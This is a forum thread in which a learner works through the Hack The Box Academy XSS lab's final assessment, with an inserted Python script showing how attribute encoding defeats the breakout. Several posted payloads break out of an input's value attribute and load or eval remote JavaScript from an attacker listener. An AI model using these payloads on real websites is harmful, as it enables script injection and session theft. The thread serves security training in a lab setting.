Academy HTB - XSS module Final Assessment

Hello everyone!
I’m getting stuck with the Final Assessment of the XSS module on Academy HTB.

Apart from the fact that the target website does not store comments anymore (I don’t know why; I also tried to reset the machine, but I always get the same target IP address), I approached the problem in the following way:

On the index page, at http://10.129.222.0/assessment/index.php, I have only one search input. I tried to inject any XSS payload and I get a message like “Results for “””, so it seems like it does not filter my input, even if nothing is triggered.

Then, I moved to the welcome-to-security-blog page, where I can see different input forms: Comment, Name, Email, Website.

Among these forms, the Email form requires an email pattern, and the Website form adds “http://” at the beginning of the text I inject, so I would exclude these two forms.

Analyzing the Comment and Name forms, I noted that they filter the inputs, so I guess one of them should be vulnerable. My suspicion focuses more on Name, where the filter deletes all content between “<” and “>”, so my solution was to encode the “<” char as “<”. With this approach, when I publish the comment (and check that it is stored), the Name with my XSS injection text is entirely shown, and the Name value is linked with the Website form. Anyway, despite this, when I use payloads like alert() or src=http://myIP:PORT/script.js (by running a listener on PORT on my machine) I don’t get anything. Of course I tried this approach also for the Comment form.

Is my current approach correct, or am I totally wrong? Should I also check other kinds of tags?

Thank you in advance!

You are close. Review Session Hijacking, a few times.

@donthackme I’m focusing on the page source structure of the “Name” field, where the HTML piece of code is:

<p class="comment-form-author"><label for="author">Name <span class="required">*</span></label> <input id="author" name="author" type="text" value="TEST" size="30" maxlength="245" required='required' /></p>

so the input text will be inserted into the “value” variable. At this point, I tried to use the onload event to execute JavaScript code by giving the following as input:
" onLoad="javascript:eval('var a=document.createElement(\'script\');a.src=\'http://10.10.14.220:8081/script.js\';document.body.appendChild(a)')
The resulting piece of the HTML page source will be the following:

<SNIP...> value="&quot; onload=&quot;javascript:eval(&#039;var a=document.createElement(\&#039;script\&#039;);a.src=\&#039;http://10.10.14.220:8081/script.js\&#039;;document.body.appendChild(a)&#039;)" size="30" maxlength="245" required='required' /></p>

but on my listener I don’t get anything.

I tried another approach, thinking: OK, not only the “Name” field but also the “Website” field can be stored, so I can store a script tag in the “Website” field and call the related function from the “Name” field. So in “Name” I typed: " onload="b() while in “Website” I typed &quot;/&gt;&lt;script&gt;function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener("load", b);a.open("GET", "//10.10.14.220:8081/script.js");a.send();&lt;/script&gt; but also in this case with no luck.

I also simply tried the following in the “Name” field: ">&lt;script+src=http://10.10.14.220:8081/script.js&gt;&lt;/script&gt; but in this case the main issue I see is the structure of the resulting HTML piece of code:

<SNIP...> value="&quot;/&gt;&lt;script+src=http://10.10.14.220:8081/script.js&gt;&lt;/script&gt;" size="30" maxlength="245" required='required' /></p>

so here I immediately close the value variable and the <input> tag with a "/> (&quot;/&gt;) and then I inject my script tag. Here my main doubt is: when I close (&lt;/script&gt;), I still have the remaining code of the <input> tag (the size, maxlength and required variables). How can I “remove” it? I tried to comment it out with <!-- (&lt;&#x21;&#x2D;&#x2D;) but it does not work (also because I guess it could comment out all the remaining HTML code of the page). I also tried to handle this doubt by declaring a second <input> tag after my </script> tag, by typing the following code in the “Name” field:

"/>&lt;script+src=http://10.10.14.220:8081/script.js&gt;&lt;/script&gt;&lt;input+id="dumm"+name="dummy"+type="text"+value="

in order to correctly concatenate the remaining size, maxlength and required variables of the <input> tag, but also in this case with no luck.
I’m feeling so stupid…
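The page source quoted above shows why the attribute-breakout attempts in this post came back inert: the application HTML-encodes the submitted Name (&quot; for the double quote, &#039; for the single quote) before placing it inside the value="…" attribute, so the quote that was meant to end the attribute is rendered as text. The following Python script is an added example (not the lab's or the poster's code) that reproduces that mitigation: it renders the same <input> markup with and without attribute encoding and parses the result to show that, with encoding, the browser sees exactly one value attribute and no onload handler. The render functions, the parser class and the sample name string are all constructed here for illustration.

```python
import html
from html.parser import HTMLParser

# Constructed sample: an attribute-breakout string of the kind posted in the
# thread, submitted as the comment author's Name.
SAMPLE_NAME = '" onLoad="javascript:eval(\'alert(1)\')'

FORM_PREFIX = ('<p class="comment-form-author"><label for="author">Name '
               '<span class="required">*</span></label> '
               '<input id="author" name="author" type="text" value="')
FORM_SUFFIX = '" size="30" maxlength="245" required=\'required\' /></p>'


def render_author_input(name: str) -> str:
    """Hardened form (hypothetical helper): the submitted name is encoded for an
    HTML attribute context. html.escape(quote=True) turns & < > " and ' into
    entities, which is what produces the &quot; / &#x27; seen in page source."""
    return FORM_PREFIX + html.escape(name, quote=True) + FORM_SUFFIX


def render_author_input_unsafe(name: str) -> str:
    """Weak form, shown only for contrast: the name is concatenated verbatim,
    so a double quote in it terminates the value attribute early."""
    return FORM_PREFIX + name + FORM_SUFFIX


class _InputAttrs(HTMLParser):
    """Collects the attributes of every <input> tag, the way a browser's
    tokenizer would see them (attribute names are lowercased, entities decoded)."""

    def __init__(self) -> None:
        super().__init__()
        self.inputs: list[dict] = []

    def handle_starttag(self, tag, attrs):
        if tag == "input":
            self.inputs.append(dict(attrs))


def parse_input_attrs(markup: str) -> list[dict]:
    """Return one attribute dict per <input> element found in markup."""
    parser = _InputAttrs()
    parser.feed(markup)
    parser.close()
    return parser.inputs


def has_event_handler(attrs: dict) -> bool:
    """True if any attribute name is an on* event handler (e.g. onload)."""
    return any(key.startswith("on") for key in attrs)


if __name__ == "__main__":
    for label, renderer in (("encoded", render_author_input),
                            ("unencoded", render_author_input_unsafe)):
        markup = renderer(SAMPLE_NAME)
        attrs = parse_input_attrs(markup)[0]
        print(f"{label}: value={attrs.get('value')!r} "
              f"event handler present={has_event_handler(attrs)}")
```

Running the script shows the encoded rendering round-trips the whole submitted string as the value attribute with no event handler, while the unencoded rendering yields an empty value and a separate onload attribute. The defensive takeaway matches what the poster observed in the page source: encoding for the attribute context, rather than stripping tags, is what keeps the input confined to the attribute.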

Solved… my “error” was so stupid…

Hey, how are you? How did you solve that? Can you explain, please?

Hello,
just discard all my analysis here and use port 8080 as the listening port on the attacker machine. Then you only need to review the Session Hijacking section, as suggested by @donthackme.